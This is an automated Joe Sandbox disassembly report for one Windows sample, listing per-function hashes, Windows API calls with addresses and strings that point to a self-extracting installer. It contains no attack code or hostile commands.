                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: ??3@
                                                      • String ID: %%S/$%%S\
                                                      • API String ID: 613200358-358529586
                                                      • Opcode ID: ca2be7d20d2ff53e81e9f3a224629587fd966fa2135bca586d8c43d41441b967
                                                      • Instruction ID: ba471a5e309da56b19bd8a7b5a96c0f25c3cff1cb933eb2d3e2d1b68bec26358
                                                      • Opcode Fuzzy Hash: ca2be7d20d2ff53e81e9f3a224629587fd966fa2135bca586d8c43d41441b967
                                                      • Instruction Fuzzy Hash: 1811F935C00109FADF05FFA1D993CEE7B38AF10308F50812AB915721E1DB7856899B88
                                                      APIs
                                                      • _CxxThrowException.MSVCRT(00416CB4,00417010), ref: 0040D834
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: ExceptionThrow
                                                      • String ID: XkA$XkA$`lA$plA$xmA$xmA
                                                      • API String ID: 432778473-1797977924
                                                      • Opcode ID: 53bc111bba272141f362da7732371027c6ffd9fc40c0fe37927965c24cbe44eb
                                                      • Instruction ID: 93ec62a24b9d8e66450440f0cc9ce576a4bb083ddd4f3a3c79e319c7eabf7869
                                                      • Opcode Fuzzy Hash: 53bc111bba272141f362da7732371027c6ffd9fc40c0fe37927965c24cbe44eb
                                                      • Instruction Fuzzy Hash: AB11D3B0601B008AC3308F169549587FBF8EF51758712CA1FD09A97A10D3F8E1888B99
                                                      APIs
                                                      • ??3@YAXPAX@Z.MSVCRT(?,00419858,00000001,00419858,00419858,00000001,?,00000000), ref: 00405543
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00419858,;!@InstallEnd@!,00000000,;!@Install@!UTF-8!,0041942C,00419858,00000001,?,00000000), ref: 004055A5
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00419858,;!@InstallEnd@!,00000000,;!@Install@!UTF-8!,0041942C,00419858,00000001,?,00000000), ref: 004055BD
                                                        • Part of subcall function 004036F1: lstrlenW.KERNEL32(004017CF,00000000,?,?,?,?,?,?,004017CF,?), ref: 004036FE
                                                        • Part of subcall function 004036F1: GetSystemTimeAsFileTime.KERNEL32(?,004017CF,?,?,?,?,004017CF,?), ref: 00403774
                                                        • Part of subcall function 004036F1: GetFileAttributesW.KERNELBASE(?,?,?,?,?,004017CF,?), ref: 0040377B
                                                        • Part of subcall function 004036F1: ??3@YAXPAX@Z.MSVCRT(?,004017CF,?,?,?,?,004017CF,?), ref: 0040383A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: ??3@$FileTime$AttributesSystemlstrlen
                                                      • String ID: ;!@Install@!UTF-8!$;!@InstallEnd@!
                                                      • API String ID: 4038993085-372238525
                                                      • Opcode ID: 849f327bd9ac8303497e36da2cb4c6cf22b81a2f47b021e930ca904fa6e9320b
                                                      • Instruction ID: 9c73dee187ac7940ac785f0cdfe29d60513ad58ba118a45472d9fba9eb214e5e
                                                      • Opcode Fuzzy Hash: 849f327bd9ac8303497e36da2cb4c6cf22b81a2f47b021e930ca904fa6e9320b
                                                      • Instruction Fuzzy Hash: EA314871D0021AEACF01EF92CC569EEBB75FF58318F10402BE415722D1DB785645DB98
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: wsprintf$ExitProcesslstrcat
                                                      • String ID: 0x%p
                                                      • API String ID: 2530384128-1745605757
                                                      • Opcode ID: 10580a38aa47e309b50d487dd3db663a32dca6cab9aaec04e50353585ed6c2b6
                                                      • Instruction ID: 82a0a4c7c3cac984b025113f951df6a1ad0c5e072908762b67de37e2b53db34b
                                                      • Opcode Fuzzy Hash: 10580a38aa47e309b50d487dd3db663a32dca6cab9aaec04e50353585ed6c2b6
                                                      • Instruction Fuzzy Hash: A4114FB5800308EFDB20EFA4DD85ADBB3BCAF44304F54447BE645A3591D678AA84CF69
                                                      APIs
                                                      • memset.MSVCRT ref: 00407DB6
                                                      • SHBrowseForFolderW.SHELL32(?), ref: 00407DCF
                                                      • SHGetPathFromIDListW.SHELL32(00000000,00000000), ref: 00407DEB
                                                      • SHGetMalloc.SHELL32(00000000), ref: 00407E15
                                                        • Part of subcall function 00407B90: GetDlgItem.USER32(?,000004B6), ref: 00407B9D
                                                        • Part of subcall function 00407B90: SetFocus.USER32(00000000,?,?,00407C84,000004B6,?), ref: 00407BA4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: BrowseFocusFolderFromItemListMallocPathmemset
                                                      • String ID: A
                                                      • API String ID: 1557639607-3554254475
                                                      • Opcode ID: 18cc2c60aeb3b7b122a965faa4dd677926e4bfd12edb83007c1ba79b931f09b9
                                                      • Instruction ID: c991f1184b04d71a34ab75a046ed33f3991a90ed18c7befb8679fee52583d13b
                                                      • Opcode Fuzzy Hash: 18cc2c60aeb3b7b122a965faa4dd677926e4bfd12edb83007c1ba79b931f09b9
                                                      • Instruction Fuzzy Hash: C3111F71A04208EBDB20DBA5C958BDE77BCAB84705F1400B9E905E7281DB78EE45CBB5
                                                      APIs
                                                      • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000001,00000000,?,?,?), ref: 00402BA2
                                                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 00402BAB
                                                        • Part of subcall function 00401172: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 00401192
                                                        • Part of subcall function 00401172: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,0040146C,00000003,?,004057B0,?,00000000), ref: 004011B8
                                                      • ExpandEnvironmentStringsW.KERNEL32(SetEnvironment,00000000,00000001,00000001,SetEnvironment), ref: 00402BC3
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00402BE3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: ??3@$EnvironmentExpandStrings$??2@
                                                      • String ID: SetEnvironment
                                                      • API String ID: 612612615-360490078
                                                      • Opcode ID: e8fa0b3595be2272ca7cde4f10b0f5fc0921c74a93664c9e2b34059132f8f849
                                                      • Instruction ID: 872148d7285510cba3beb976fe90dd67b0f7b9c7622c942f2c5d0e041fd95c9f
                                                      • Opcode Fuzzy Hash: e8fa0b3595be2272ca7cde4f10b0f5fc0921c74a93664c9e2b34059132f8f849
                                                      • Instruction Fuzzy Hash: 93015E72D00104BADB15ABA5ED81DEEB3BCAF44314B10416BF902B71D1DBB96A418AA8
                                                      APIs
                                                      • lstrlenW.KERNEL32(004193C0,00000020,-00000002,-00000004,00405FF0,-00000002,?,?,00000000,0000000A), ref: 00404664
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00404716
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 0040471E
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 0040472D
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00404735
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: ??3@$lstrlen
                                                      • String ID:
                                                      • API String ID: 2031685711-0
                                                      • Opcode ID: d15cad0f0c41d13a09eacb462fe7c815c34d510d673a08016ce01c41ca1114b9
                                                      • Instruction ID: aeb94b40578403fee1b74b38ef18ad41e7f72b790eaa200ba48685626c4261d0
                                                      • Opcode Fuzzy Hash: d15cad0f0c41d13a09eacb462fe7c815c34d510d673a08016ce01c41ca1114b9
                                                      • Instruction Fuzzy Hash: 6B214972D00104ABCF216FA0CC019EE77A8EF96355F10443BEA41B72E1F77E4D818648
                                                      APIs
                                                        • Part of subcall function 00407A6B: GetSystemMetrics.USER32(0000000B), ref: 00407A93
                                                        • Part of subcall function 00407A6B: GetSystemMetrics.USER32(0000000C), ref: 00407A9C
                                                      • GetSystemMetrics.USER32(00000007), ref: 004080B4
                                                      • GetSystemMetrics.USER32(00000007), ref: 004080C5
                                                      • ??3@YAXPAX@Z.MSVCRT(?,000004B8,?,?), ref: 0040818C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: MetricsSystem$??3@
                                                      • String ID: 100%%
                                                      • API String ID: 2562992111-568723177
                                                      • Opcode ID: fabbb39860fad69752470b08725fe937d63e645657f5ef185aad17f5aeca07b3
                                                      • Instruction ID: 0c509f118c308a7c78e08742548c734dda8a0b47b1f593a1d30cecdc3777ed32
                                                      • Opcode Fuzzy Hash: fabbb39860fad69752470b08725fe937d63e645657f5ef185aad17f5aeca07b3
                                                      • Instruction Fuzzy Hash: CE31D471A007059FCB24DF65C9459AEB7F4EF40704B00052ED542A72D1DB74FD45CBA9
                                                      APIs
                                                        • Part of subcall function 00407C87: GetSystemMetrics.USER32(00000010), ref: 00407CC9
                                                        • Part of subcall function 00407C87: GetSystemMetrics.USER32(00000011), ref: 00407CD7
                                                      • wsprintfW.USER32 ref: 00404F19
                                                      • ??3@YAXPAX@Z.MSVCRT(00405872,00000011,00405872,00000000,004166D0,?), ref: 00404F56
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: MetricsSystem$??3@wsprintf
                                                      • String ID: %X - %03X - %03X - %03X - %03X$xcA
                                                      • API String ID: 1174869416-1550840741
                                                      • Opcode ID: 13607f26764211286450a12f581171f5f33c4cbed9d170023895b6b5c7c453f0
                                                      • Instruction ID: 41466d8614d0a23c37c50aec3ef54a83e840c1df2718244856808616b3002f3b
                                                      • Opcode Fuzzy Hash: 13607f26764211286450a12f581171f5f33c4cbed9d170023895b6b5c7c453f0
                                                      • Instruction Fuzzy Hash: F9117F71D44218ABDB15EB90DC56FEDB334BB10B08F10417EEA55361D2DBB86A44CB9C
                                                      APIs
                                                      • lstrlenW.KERNEL32(Mg@,00000000,?,00000000,00404262,00000000,00000000,0040674D,?,waitall,00000000,00000000,?,?,00419810), ref: 00404228
                                                      • lstrlenW.KERNEL32(?,?,?,00419810), ref: 00404231
                                                      • _wcsnicmp.MSVCRT ref: 0040423D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: lstrlen$_wcsnicmp
                                                      • String ID: Mg@
                                                      • API String ID: 2823567412-3680729969
                                                      • Opcode ID: ba891c330881e9cd37824329b79c8b3bdedf28b88df0ad5e9eae37b6568f1235
                                                      • Instruction ID: 9e1626592046255a92b3b8c2eb79444d9ed7104295bc7c238f4b93e2fb8c8d27
                                                      • Opcode Fuzzy Hash: ba891c330881e9cd37824329b79c8b3bdedf28b88df0ad5e9eae37b6568f1235
                                                      • Instruction Fuzzy Hash: 09E026726042019BC700CBA5ED84C8B7BECEAC8790B00087BF700E3011E334D8148BB5
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32,Wow64RevertWow64FsRedirection,00406A9D,00000000,?,?), ref: 004023C8
                                                      • GetProcAddress.KERNEL32(00000000), ref: 004023CF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32
                                                      • API String ID: 2574300362-3900151262
                                                      • Opcode ID: cd6f73cecb1163c3412e02ff2c631c42379205c8e465c85e169b66b0ab90bb67
                                                      • Instruction ID: 50d9489a907287b4f58dec005f8c8a71b0fe89906bae8f062ddf8536b40cf8c2
                                                      • Opcode Fuzzy Hash: cd6f73cecb1163c3412e02ff2c631c42379205c8e465c85e169b66b0ab90bb67
                                                      • Instruction Fuzzy Hash: C3D0C970A91700FBDB511FA0EE2DBD636A6EB80B0BF448436E812A00F0C7FC4884CA1C
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(kernel32,Wow64DisableWow64FsRedirection,0040243F,?,004069D7,?,00000000,?,?), ref: 004023FA
                                                      • GetProcAddress.KERNEL32(00000000), ref: 00402401
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32
                                                      • API String ID: 2574300362-736604160
                                                      • Opcode ID: 3cb0454e562955199366be55c27431b89f07c429e32f9a257932cf547d8e03b3
                                                      • Instruction ID: 88d9777829bf04cc8710f0dfabc1d7fbda4bae52ffa2c7d5b88ac942ae81d74a
                                                      • Opcode Fuzzy Hash: 3cb0454e562955199366be55c27431b89f07c429e32f9a257932cf547d8e03b3
                                                      • Instruction Fuzzy Hash: FFD0C970691600FAD7105FA4DD2DBC639A6AFC0B06F548026A016E00D4C7FC4880861D
                                                      APIs
                                                      • ??3@YAXPAX@Z.MSVCRT(00405802,00405802,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802,00000000,00000000), ref: 00402EDC
                                                        • Part of subcall function 00402AD8: MultiByteToWideChar.KERNEL32(00000020,00000000,00000024,?,00000000,?,?,00000020,00000024,00000000,00402E3A,?,?,00000000,00000000,00000000), ref: 00402B0A
                                                      • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802,00000000), ref: 00402E49
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?,00405802), ref: 00402E64
                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,?), ref: 00402E6C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: ??3@$ByteCharMultiWide
                                                      • String ID:
                                                      • API String ID: 1731127917-0
                                                      • Opcode ID: 06566461e08c1a272ac3e39536e9c8754d999218ac62e5e41573a74a5ed02a71
                                                      • Instruction ID: e682ebc0571d90e9fd1001dd074fc16d37aecbe567f5019eda1f00a411694e7c
                                                      • Opcode Fuzzy Hash: 06566461e08c1a272ac3e39536e9c8754d999218ac62e5e41573a74a5ed02a71
                                                      • Instruction Fuzzy Hash: BE31F672C44114AADB14FBA2DD429EF73BDEF10318B50443FF856B21E1EE3C9A4586A8
                                                      APIs
                                                      • _CxxThrowException.MSVCRT(00100EC3,00417010), ref: 0040CD3C
                                                      • ??2@YAPAXI@Z.MSVCRT(00000004,004193AC,004193AC,00000000,?,0040CE09,00000064,004107AA,004193AC,004032FF,00000000,00000000,004049F2,?,?,?), ref: 0040CD64
                                                      • memcpy.MSVCRT(00000000,009BAF28,00000004,004193AC,004193AC,00000000,?,0040CE09,00000064,004107AA,004193AC,004032FF,00000000,00000000,004049F2,?), ref: 0040CD8D
                                                      • ??3@YAXPAX@Z.MSVCRT(009BAF28,004193AC,004193AC,00000000,?,0040CE09,00000064,004107AA,004193AC,004032FF,00000000,00000000,004049F2,?,?,?), ref: 0040CD98
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: ??2@??3@ExceptionThrowmemcpy
                                                      • String ID:
                                                      • API String ID: 3462485524-0
                                                      • Opcode ID: 921dd64680e7e3a1ec90b61e2a1bd2c818f6053e54720969ddb0d42743a11d4e
                                                      • Instruction ID: d1fdfccabdcefd16927407a1053df183a81c89610647dbf5fb7e55cd38556c17
                                                      • Opcode Fuzzy Hash: 921dd64680e7e3a1ec90b61e2a1bd2c818f6053e54720969ddb0d42743a11d4e
                                                      • Instruction Fuzzy Hash: 2F11E572200300EBCB289F16D9C0D5BFFE9AF843547108A3FE559A7390D779E98547A8
                                                      APIs
                                                        • Part of subcall function 004071BD: GetDlgItem.USER32(?,?), ref: 004071C9
                                                        • Part of subcall function 004071DA: GetDlgItem.USER32(?,?), ref: 004071E7
                                                        • Part of subcall function 004071DA: ShowWindow.USER32(00000000,?), ref: 004071FE
                                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00408A64
                                                      • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000103), ref: 00408A84
                                                      • GetDlgItem.USER32(?,000004B7), ref: 00408A97
                                                      • SetWindowLongW.USER32(00000000,000000FC,Function_00007823), ref: 00408AA5
                                                        • Part of subcall function 004086EB: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00408AB5), ref: 00408714
                                                        • Part of subcall function 004086EB: LoadIconW.USER32(00000000), ref: 00408717
                                                        • Part of subcall function 004086EB: GetSystemMetrics.USER32(00000032), ref: 0040872B
                                                        • Part of subcall function 004086EB: GetSystemMetrics.USER32(00000031), ref: 00408730
                                                        • Part of subcall function 004086EB: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00408AB5), ref: 00408739
                                                        • Part of subcall function 004086EB: LoadImageW.USER32(00000000), ref: 0040873C
                                                        • Part of subcall function 004086EB: SendMessageW.USER32(?,00000080,00000001,?), ref: 0040875C
                                                        • Part of subcall function 004086EB: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408765
                                                        • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B2), ref: 00408781
                                                        • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B2), ref: 0040878B
                                                        • Part of subcall function 004086EB: GetWindowLongW.USER32(?,000000F0), ref: 00408797
                                                        • Part of subcall function 004086EB: SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087A6
                                                        • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B5), ref: 004087B4
                                                        • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B5), ref: 004087C2
                                                        • Part of subcall function 004086EB: GetWindowLongW.USER32(?,000000F0), ref: 004087CE
                                                        • Part of subcall function 004086EB: SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087DD
                                                        • Part of subcall function 00407B90: GetDlgItem.USER32(?,000004B6), ref: 00407B9D
                                                        • Part of subcall function 00407B90: SetFocus.USER32(00000000,?,?,00407C84,000004B6,?), ref: 00407BA4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: Item$Window$Long$System$HandleLoadMessageMetricsModuleSend$DirectoryFileFocusIconImageInfoShow
                                                      • String ID:
                                                      • API String ID: 3043669009-0
                                                      • Opcode ID: 10e1b547bcbc61deca10da6efc8ae89d0555480e65f43c52d8748ed5732768f8
                                                      • Instruction ID: 5c7c764d92766e680c666047e1d2b266a9282aef260ce17b2660fed0a98cdec4
                                                      • Opcode Fuzzy Hash: 10e1b547bcbc61deca10da6efc8ae89d0555480e65f43c52d8748ed5732768f8
                                                      • Instruction Fuzzy Hash: 62118672E40314ABCB10EBA9DC09FDE77BCEB84714F10446BB652E72D0DAB8A9018B54
                                                      APIs
                                                      • SystemParametersInfoW.USER32(00000029,000001F4,?,00000000), ref: 004070C2
                                                      • GetSystemMetrics.USER32(00000031), ref: 004070E8
                                                      • CreateFontIndirectW.GDI32(?), ref: 004070F7
                                                      • DeleteObject.GDI32(00000000), ref: 00407126
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2539634626.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2539573023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539727471.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539792747.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2539877583.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_T8xrZb7nBL.jbxd
                                                      Similarity
                                                      • API ID: System$CreateDeleteFontIndirectInfoMetricsObjectParameters
                                                      • String ID:
                                                      • API String ID: 1900162674-0
                                                      • Opcode ID: 10c1999775b064906eaa368cc7bf841ba5ce139f6ebf31b08def3ab2d55476d3
                                                      • Instruction ID: 550de309380991ebf2cc5542bfcce979d3dc35c4f0fc859f263023f0ef030489
                                                      • Opcode Fuzzy Hash: 10c1999775b064906eaa368cc7bf841ba5ce139f6ebf31b08def3ab2d55476d3
                                                      • Instruction Fuzzy Hash: E4112475A00205EFDB109F94DC88BEA77B8EB44300F0081AAE915A7391DB74AD44CF94
                                                      APIs
